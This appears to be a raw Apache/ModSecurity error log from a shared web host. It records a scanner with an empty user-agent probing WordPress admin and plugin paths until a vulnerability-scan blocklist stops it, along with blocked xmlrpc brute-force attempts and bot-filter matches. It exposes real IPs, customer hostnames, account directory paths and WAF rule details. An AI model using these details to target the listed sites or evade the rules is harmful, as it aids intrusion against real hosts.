[Tue May 26 17:06:29.065691 2026] [security2:error] [pid 851641:tid 851776] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFvBp8QSN2510avp47LAAAAAU"]
[Tue May 26 17:06:29.253184 2026] [autoindex:error] [pid 851641:tid 851824] [client 89.117.104.11:40088] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-admin/images/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:29.253885 2026] [security2:error] [pid 851641:tid 851824] [client 89.117.104.11:40088] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFvRp8QSN2510avp47QQAAADU"]
[Tue May 26 17:06:30.061234 2026] [security2:error] [pid 851641:tid 851857] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFvRp8QSN2510avp47XAAAAFY"]
[Tue May 26 17:06:30.061261 2026] [security2:error] [pid 851641:tid 851857] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFvRp8QSN2510avp47XAAAAFY"]
[Tue May 26 17:06:30.073601 2026] [security2:error] [pid 851641:tid 851832] [client 89.117.104.11:40088] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/wp-content/plugins/wordpress-seo/js/dist/"] [unique_id "ahWFvRp8QSN2510avp47WgAAAD0"]
[Tue May 26 17:06:30.330331 2026] [security2:error] [pid 851641:tid 851892] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFvhp8QSN2510avp47ZgAAAHk"]
[Tue May 26 17:06:30.330373 2026] [security2:error] [pid 851641:tid 851892] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFvhp8QSN2510avp47ZgAAAHk"]
[Tue May 26 17:06:30.331044 2026] [security2:error] [pid 851641:tid 851868] [client 89.117.104.11:40088] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/wp-content/plugins/wordpress-seo/"] [unique_id "ahWFvhp8QSN2510avp47ZAAAAGE"]
[Tue May 26 17:06:30.923810 2026] [security2:error] [pid 851641:tid 851812] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFvhp8QSN2510avp47dAAAACk"]
[Tue May 26 17:06:30.923838 2026] [security2:error] [pid 851641:tid 851812] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFvhp8QSN2510avp47dAAAACk"]
[Tue May 26 17:06:30.924261 2026] [security2:error] [pid 851641:tid 851784] [client 89.117.104.11:40088] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/js/"] [unique_id "ahWFvhp8QSN2510avp47cgAAAA0"]
[Tue May 26 17:06:31.136436 2026] [security2:error] [pid 851641:tid 851836] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFvhp8QSN2510avp47bgAAAEE"]
[Tue May 26 17:06:31.269558 2026] [security2:error] [pid 851641:tid 851834] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFvxp8QSN2510avp47fgAAAD8"]
[Tue May 26 17:06:31.269581 2026] [security2:error] [pid 851641:tid 851834] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFvxp8QSN2510avp47fgAAAD8"]
[Tue May 26 17:06:31.270136 2026] [security2:error] [pid 851641:tid 851880] [client 89.117.104.11:40088] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/wp-content/plugins/woocommerce/assets/js/"] [unique_id "ahWFvxp8QSN2510avp47fAAAAG0"]
[Tue May 26 17:06:31.763479 2026] [security2:error] [pid 851641:tid 851866] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFvxp8QSN2510avp47kAAAAF8"]
[Tue May 26 17:06:31.763505 2026] [security2:error] [pid 851641:tid 851866] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFvxp8QSN2510avp47kAAAAF8"]
[Tue May 26 17:06:31.764123 2026] [security2:error] [pid 851641:tid 851817] [client 89.117.104.11:40088] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/wp-content/plugins/woocommerce/"] [unique_id "ahWFvxp8QSN2510avp47jgAAAC4"]
[Tue May 26 17:06:32.125837 2026] [security2:error] [pid 851641:tid 851837] [client 89.117.104.11:40088] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFwBp8QSN2510avp47kQAAAEI"]
[Tue May 26 17:06:32.125883 2026] [security2:error] [pid 851641:tid 851837] [client 89.117.104.11:40088] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFwBp8QSN2510avp47kQAAAEI"]
[Tue May 26 17:06:32.569556 2026] [security2:error] [pid 851641:tid 851857] [client 89.117.104.11:40088] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-admin/network/index.php"] [unique_id "ahWFwBp8QSN2510avp47nAAAAFY"]
[Tue May 26 17:06:33.323168 2026] [security2:error] [pid 851641:tid 851822] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFwBp8QSN2510avp47qwAAADM"]
[Tue May 26 17:06:33.763201 2026] [security2:error] [pid 851641:tid 851804] [client 89.117.104.11:52076] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-admin/network/index.php"] [unique_id "ahWFwRp8QSN2510avp47uQAAACE"]
[Tue May 26 17:06:34.017124 2026] [security2:error] [pid 851641:tid 851881] [client 203.194.101.7:52167] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWFwhp8QSN2510avp47wQAAAG4"]
[Tue May 26 17:06:34.017246 2026] [security2:error] [pid 851641:tid 851881] [client 203.194.101.7:52167] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWFwhp8QSN2510avp47wQAAAG4"]
[Tue May 26 17:06:34.648231 2026] [security2:error] [pid 851641:tid 851876] [client 89.117.104.11:52076] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 11.104.117.89.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWFwRp8QSN2510avp47wAAAAGk"]
[Tue May 26 17:06:34.648390 2026] [security2:error] [pid 851641:tid 851876] [client 89.117.104.11:52076] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWFwRp8QSN2510avp47wAAAAGk"]
[Tue May 26 17:06:34.953811 2026] [security2:error] [pid 851641:tid 851890] [client 89.117.104.11:40088] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-admin/user/index.php"] [unique_id "ahWFwhp8QSN2510avp472wAAAHc"]
[Tue May 26 17:06:35.685555 2026] [security2:error] [pid 851641:tid 851793] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFwxp8QSN2510avp474gAAABY"]
[Tue May 26 17:06:35.953887 2026] [security2:error] [pid 851641:tid 851792] [client 89.117.104.11:40702] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-admin/user/index.php"] [unique_id "ahWFwxp8QSN2510avp479gAAABU"]
[Tue May 26 17:06:36.587931 2026] [security2:error] [pid 851641:tid 851828] [client 89.117.104.11:40702] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 11.104.117.89.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWFxBp8QSN2510avp48BQAAADk"]
[Tue May 26 17:06:36.588082 2026] [security2:error] [pid 851641:tid 851828] [client 89.117.104.11:40702] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWFxBp8QSN2510avp48BQAAADk"]
[Tue May 26 17:06:36.801216 2026] [security2:error] [pid 851641:tid 851816] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-content/index.php"] [unique_id "ahWFxBp8QSN2510avp48CAAAAC0"]
[Tue May 26 17:06:36.801635 2026] [security2:error] [pid 851641:tid 851851] [client 89.117.104.11:40088] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-content/"] [unique_id "ahWFxBp8QSN2510avp48BgAAAFA"]
[Tue May 26 17:06:37.059485 2026] [security2:error] [pid 851641:tid 851876] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-content/plugins/index.php"] [unique_id "ahWFxRp8QSN2510avp48FQAAAGk"]
[Tue May 26 17:06:37.068878 2026] [security2:error] [pid 851641:tid 851835] [client 89.117.104.11:40088] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-content/plugins/"] [unique_id "ahWFxRp8QSN2510avp48EwAAAEA"]
[Tue May 26 17:06:37.288181 2026] [security2:error] [pid 851641:tid 851773] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-content/themes/index.php"] [unique_id "ahWFxRp8QSN2510avp48HAAAAAI"]
[Tue May 26 17:06:37.321580 2026] [security2:error] [pid 851641:tid 851832] [client 89.117.104.11:40088] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-content/themes/"] [unique_id "ahWFxRp8QSN2510avp48GgAAAD0"]
[Tue May 26 17:06:37.611237 2026] [autoindex:error] [pid 851641:tid 851848] [client 89.117.104.11:40088] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-admin/includes/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:37.612002 2026] [security2:error] [pid 851641:tid 851848] [client 89.117.104.11:40088] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFxRp8QSN2510avp48JgAAAE0"]
[Tue May 26 17:06:37.645645 2026] [security2:error] [pid 851641:tid 851886] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFxRp8QSN2510avp48GQAAAHM"]
[Tue May 26 17:06:37.887735 2026] [security2:error] [pid 851641:tid 851791] [client 89.117.104.11:40088] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-admin/index.php"] [unique_id "ahWFxRp8QSN2510avp48KgAAABQ"]
[Tue May 26 17:06:38.261971 2026] [security2:error] [pid 851641:tid 851803] [client 74.7.175.159:60458] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "makwasi.com"] [uri "/cgi-sys/404.html"] [unique_id "ahWFxhp8QSN2510avp48MQAAIHs"]
[Tue May 26 17:06:38.985589 2026] [security2:error] [pid 851641:tid 851863] [client 74.7.241.160:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.rakeshdewan.moes-art.com"] [uri "/robots.txt"] [unique_id "ahWFxhp8QSN2510avp48RgAAAFw"]
[Tue May 26 17:06:38.986282 2026] [security2:error] [pid 851641:tid 851798] [client 74.7.241.160:37094] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.rakeshdewan.moes-art.com"] [uri "/robots.txt"] [unique_id "ahWFxhp8QSN2510avp48RAAAGy0"]
[Tue May 26 17:06:39.786747 2026] [security2:error] [pid 851641:tid 851864] [client 114.119.152.167:40465] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahWFxxp8QSN2510avp48XwAAAF0"], referer: http://haddingtonwines.com/cart?remove_item=1dfcb07c683107f038d8c886145d097e
[Tue May 26 17:06:39.800232 2026] [security2:error] [pid 851641:tid 851832] [client 89.117.104.11:40710] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-admin/index.php"] [unique_id "ahWFxxp8QSN2510avp48XQAAAD0"]
[Tue May 26 17:06:39.849330 2026] [security2:error] [pid 851641:tid 851885] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFxxp8QSN2510avp48UAAAAHI"]
[Tue May 26 17:06:39.969668 2026] [security2:error] [pid 851641:tid 851781] [client 89.117.104.11:40710] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 11.104.117.89.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWFxxp8QSN2510avp48ZQAAAAo"]
[Tue May 26 17:06:39.969811 2026] [security2:error] [pid 851641:tid 851781] [client 89.117.104.11:40710] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWFxxp8QSN2510avp48ZQAAAAo"]
[Tue May 26 17:06:40.105046 2026] [security2:error] [pid 851641:tid 851848] [client 14.231.160.124:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFxxp8QSN2510avp48WQAAAE0"]
[Tue May 26 17:06:40.211459 2026] [autoindex:error] [pid 851641:tid 851786] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:40.212436 2026] [security2:error] [pid 851641:tid 851786] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFyBp8QSN2510avp48bgAAAA8"]
[Tue May 26 17:06:40.212876 2026] [security2:error] [pid 851641:tid 851775] [client 89.117.104.11:40088] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-content/upgrade/"] [unique_id "ahWFyBp8QSN2510avp48bAAAAAQ"]
[Tue May 26 17:06:40.802663 2026] [security2:error] [pid 851641:tid 851819] [client 34.141.215.197:8192] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^/llms.txt" against "REQUEST_URI" required. [file "/opt/mod_security/hg_rules.conf"] [line "588"] [id "999814"] [msg "Misbehaving AI Crawler"] [hostname "cpcontacts.plenitudotonal.com"] [uri "/"] [unique_id "ahWFyBp8QSN2510avp48mQAAADA"]
[Tue May 26 17:06:40.802765 2026] [security2:error] [pid 851641:tid 851819] [client 34.141.215.197:8192] ModSecurity: Warning. Matched phrase "Scrapy" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "cpcontacts.plenitudotonal.com"] [uri "/"] [unique_id "ahWFyBp8QSN2510avp48mQAAADA"]
[Tue May 26 17:06:40.988186 2026] [security2:error] [pid 851641:tid 851707] [remote 94.76.235.103:48190] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahWFyBp8QSN2510avp48mAAAC0E"]
[Tue May 26 17:06:41.296692 2026] [security2:error] [pid 851641:tid 851655] [remote 74.7.241.58:56266] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWFyRp8QSN2510avp48owAABQ0"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 17:06:41.740561 2026] [security2:error] [pid 851641:tid 851805] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFyRp8QSN2510avp48pgAAACI"]
[Tue May 26 17:06:44.079699 2026] [security2:error] [pid 851641:tid 851813] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFyxp8QSN2510avp481gAAACo"]
[Tue May 26 17:06:44.319683 2026] [security2:error] [pid 851641:tid 851883] [client 203.194.101.7:52505] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWFzBp8QSN2510avp487AAAAHA"]
[Tue May 26 17:06:44.319834 2026] [security2:error] [pid 851641:tid 851883] [client 203.194.101.7:52505] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWFzBp8QSN2510avp487AAAAHA"]
[Tue May 26 17:06:44.665042 2026] [security2:error] [pid 851641:tid 851844] [client 102.182.241.203:55237] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.241.182.102.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "paqys.com"] [uri "/xmlrpc.php"] [unique_id "ahWFzBp8QSN2510avp485gAAAEk"]
[Tue May 26 17:06:44.665255 2026] [security2:error] [pid 851641:tid 851844] [client 102.182.241.203:55237] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "paqys.com"] [uri "/xmlrpc.php"] [unique_id "ahWFzBp8QSN2510avp485gAAAEk"]
[Tue May 26 17:06:44.697898 2026] [security2:error] [pid 851641:tid 851837] [client 112.86.225.246:44330] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.acdealernoida.in"] [uri "/"] [unique_id "ahWFzBp8QSN2510avp488gAAAEI"]
[Tue May 26 17:06:44.698024 2026] [security2:error] [pid 851641:tid 851837] [client 112.86.225.246:44330] ModSecurity: Warning. Matched phrase "Sogou web spider" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.acdealernoida.in"] [uri "/"] [unique_id "ahWFzBp8QSN2510avp488gAAAEI"]
